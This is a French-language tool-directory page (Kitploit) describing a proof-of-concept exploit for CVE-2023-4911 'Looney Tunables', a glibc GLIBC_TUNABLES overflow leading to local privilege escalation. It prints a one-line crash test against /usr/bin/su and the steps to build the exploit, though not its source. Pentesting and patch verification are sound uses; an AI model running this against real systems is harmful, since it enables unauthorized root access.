Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
looney-tunables-CVE-2023-4911 — Preuve de concept d'exploit pour CVE-2023-4911 (Looney Tunables), ciblant un dépassement de tampon dans l'analyse de GLIBC_TUNABLES de glibc. Comprend la détection de vulnérabilité et un exploit compilé pour l'escalade de privilèges. | Kitploit
Outils/GitHubGitHub/hadrian3689/looney-tunables-cve-2023-4911
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubhadrian3689/looney-tunables-cve-2023-4911

looney-tunables-CVE-2023-4911

Preuve de concept d'exploit pour CVE-2023-4911 (Looney Tunables), ciblant un dépassement de tampon dans l'analyse de GLIBC_TUNABLES de glibc. Comprend la détection de vulnérabilité et un exploit compilé pour l'escalade de privilèges.

Voir le dépôt
2965il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept de CVE-2023-4911 Looney Tunables

Ceci est une Preuve de Concept (PoC) de CVE-2023-4911 (alias "Looney Tunables") exploitant un bogue dans la fonction d'analyse de la variable d'environnement GLIBC_TUNABLES du chargeur dynamique de glibc, parse_tunables().

Pour commencer

Exécution du programme

  • Nous pouvons vérifier si la cible est vulnérable
root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
  • Si nous obtenons un Segmentation fault (core dumped), alors nous avons affaire à une cible vulnérable.

Exécution du programme

  • Créer le fichier libc.so.6
root@kitploit:~
python3 libc.py
  • Compiler l'exploit
root@kitploit:~
gcc exp.c -o exp

Avertissement

Tout le code fourni dans ce dépôt est uniquement à des fins éducatives et de recherche. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code de ce dépôt peut entraîner des poursuites pénales contre les personnes concernées. L'auteur ne pourra être tenu pour responsable dans l'éventualité où des poursuites pénales seraient engagées contre des individus utilisant abusivement le code de ce dépôt pour enfreindre la loi.

Télécharger l’outil